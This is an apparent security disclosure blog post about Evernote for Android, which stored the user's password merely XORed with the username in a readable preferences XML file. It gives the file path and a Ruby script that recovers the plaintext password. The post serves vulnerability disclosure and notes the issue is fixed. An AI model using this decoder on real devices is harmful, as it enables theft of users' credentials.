Update: Evernote has reported that this issue has been addressed.
Evernote for Android stores various settings in an XML, this file though isn’t really protected – it’s easily readable, especially if an attacker is able to get physical access to a device, what’s worse is that it contains the user’s credentials.
/data/data/com.evernote/shared_prefs/com.evernote_preferences.xml
The username in located in the <string name="username">
element, and the password is stored in <string name="encrypted_password">
– from the name you’d assume that the password is actually encrypted. You’d be wrong.
The password is simply XORed with the username, making recovery simple.
Here’s a simple script to “decrypt” the password:
#!/usr/bin/env ruby
##
# Copyright 2013 Adam Caudill <adam@adamcaudill.com>
#
# Decodes Evernote password recovered from Evernote for Android config file:
# File: /data/data/com.evernote/shared_prefs/com.evernote_preferences.xml
# (may also be in <userid>.prof.xml if missing from com.evernote_preferences.xml)
# Password: <string name="encrypted_password">
# Username: <string name="username">
##
require "base64"
if ARGV.count != 2
puts 'Usage: ./evernote_pass_decode.rb <pass> <username>'
end
pass = Base64.decode64(ARGV[0])
user = ARGV[1]
final = ''
pass.bytes.each_with_index do |byte, index|
final += (byte ^ user[index % user.length].unpack('c')[0]).chr
end
puts "Password: #{final}"